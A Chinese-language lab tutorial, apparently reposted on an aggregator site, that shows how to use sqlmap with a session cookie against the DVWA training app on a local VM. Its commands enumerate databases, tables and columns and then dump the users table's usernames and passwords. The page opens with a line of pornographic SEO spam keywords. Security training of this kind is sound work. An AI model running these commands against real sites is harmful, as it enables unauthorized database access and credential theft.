日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

使用Sqlmap对dvwa进行sql注入测试(初级阶段)

發布時間:2023/12/20 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 使用Sqlmap对dvwa进行sql注入测试(初级阶段) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

0.測試準備

1)打開Kali虛擬機終端;

2)打開靶機OWASP,并通過瀏覽器,輸入IP地址進入dvwa的主頁,然后選擇SQL injection進入SQL注入的測試頁面

1.獲取DVWA的url和cookie

在輸入框中輸入1,顯示有內容,此時利用此URL進行SQL注入。
輸入document.cookie獲取頁面的cookie。去除remem_token字段的內容,用于下文的sql注入終端的cookie。

3.在終端開始測試

1)終端中輸入指令一:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” --dbs
結果如下,說明找到了連個數據庫dvwa和information_schema,接下來獲取數據庫dvwa 中的表格。
2)在終端中輸入指令二:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa --tables
結果如下,發現有兩個表格,guestbook和users,接下來獲取users數據表中有哪些列。
3)在終端中輸入指令三:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --columns
結果如下,說明users一共有六列,接下來獲取具體內容

4)在終端中輸入指令四,有提示信息則輸入y:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --dump
結果如下,表格中的數據即顯示。
5)若數據庫中數據較多,可在終端中輸入指令五,只輸出用戶名和密碼字段:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users -C “user,password” --dump


結束!

總結

以上是生活随笔為你收集整理的使用Sqlmap对dvwa进行sql注入测试(初级阶段)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。